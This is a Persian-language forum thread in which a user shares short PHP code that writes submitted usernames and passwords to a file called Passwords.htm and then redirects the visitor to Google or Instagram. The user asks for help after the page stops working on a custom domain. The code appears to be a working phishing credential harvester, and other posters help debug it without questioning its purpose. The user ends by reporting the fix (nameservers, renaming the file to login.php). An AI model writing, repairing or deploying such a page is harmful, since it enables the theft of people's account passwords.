PDA

View Full Version : عمل نکردن کد php

amir6771
جمعه 03 مهر 1394, 16:52 عصر
سلام دوستان

من توی سایتم یک فرم دارم که کاربر بعد از پر کردن اون و زدن دکمه submit به یک url دیگه منتقل میشه.(مثلا گوگل)
و اطلاعات ثبت نامیش شامل یوزر و پسووردش هم سیو میشه.این هم کد php ساده ای هست که برا این کار نوشتم:

<html>
<head></head>
<body>
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Username:$_POST[field1]\tPassword:$_POST[field2]");
echo $fp ;
header("Location:https://google.com/");
?>

</body>
</html>

بعد هم فایل html و php رو روی یه هاست رایگان (000webhost) آپلود کردم.

خب تا اینجای کار مشکلی نبود و همه چی خوب کار میکرد.یوزر و پس سیو میشد و انتقال به یه سایت دیگه هم درست صورت میگرفت...اما وقتی به آدرس صفحه اصلی سایتم(index.htm) یه دامنه متصل کردم و از طریق آدرس دامنه جدید وارد سایتم میشم ، دیگه فایل php به درستی کار نمیکنه! مثلا بعد از کلیک کابر دیگه منتقل نمیشه به آدرسی که مشخص کردم! یا یوزر و پسوورد سیو نمیشه...

مشکل از کجاست؟ کد php مشکل داره یا تو اتصال دامنه اشتباه کردم؟

H:Shojaei
شنبه 04 مهر 1394, 12:24 عصر
اما وقتی به آدرس صفحه اصلی سایتم(index.htm) یه دامنه متصل کردم

یعنی چی این جمله!؟
سوالتون نامفهومه

amir6771
شنبه 04 مهر 1394, 12:44 عصر
یعنی چی این جمله!؟
سوالتون نامفهومه

یعنی اینکه من سایتم رو روی یک هاست رایگان قرار دادم.آدرس سایت هم برای مثال 000webhost.com/index.htm و بعد برای اینکه این آدرس رو تغییر بدم یه دامین براش گرفتم (mysite.tk) .حالا وقتی به این آدرس جدید میرم صفحه اصلی سایتم بالا میاد ولی کد php کار نمیکنه .(مثلا با کلیک کاربر دیگه به گوگل منقل نمیشه و ...).در حالیکه وقتی از طریق همون آدرس 000webhost.com/index.htm
میرم هیچ مشکلی نداره و همه کدها به درستی کار میکنه...

hamedarian2009
شنبه 04 مهر 1394, 13:11 عصر
ربطی به تغییر دامنه نداره حتما خطایی در کدتون وجود داره که احتمالا مجوز نوشتن در فایل رو ندارید بهتره نمایش خطاها را توی هاست روشن کنید کد زیر را بالای دستوراتتون قرار بدین و خطایی که میده رو اینجا قرار دهید :

error_reporting(E_ALL);
ini_set('display_errors', 1);

amir6771
شنبه 04 مهر 1394, 13:58 عصر
ربطی به تغییر دامنه نداره حتما خطایی در کدتون وجود داره که احتمالا مجوز نوشتن در فایل رو ندارید بهتره نمایش خطاها را توی هاست روشن کنید کد زیر را بالای دستوراتتون قرار بدین و خطایی که میده رو اینجا قرار دهید :

error_reporting(E_ALL);

هیچ خطایی نمیده رو هاست.php هم درست کار میکنه.کد php

<html>
<head></head>
<body>
<?php
error_reporting(E_ALL);
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Username:$_POST[field1]\tPassword:$_POST[field2]");
echo $fp ;
header("Location:https://instagram.com/");
?>

</body>
</html>

ولی وقتی از طریق دامین جدیدم میرم کار نمیکنه!
به نظرم مشکل از اتصال دامین باشه! نکته خاصی رو به نظرتون تو اتصال دامنه باید رعایت کنم؟

H:Shojaei
شنبه 04 مهر 1394, 17:13 عصر
عجیبه!!! قبل <?php یه کلمه بنویسید و بعدش هم یک چیزی echo کنید و همچنین آخر کدهای php هم یه متن دیگه echo کنید ببینید هرسه میان!؟

amir6771
یک شنبه 05 مهر 1394, 09:18 صبح
مشکلم حل شد دوستان

اولین مشکلم این بود که nameserver ها رو موقع اتصال دامین تغییر نداده بودم.و اینکه اسم فایل php رو از index.php به login.php تغییر دادم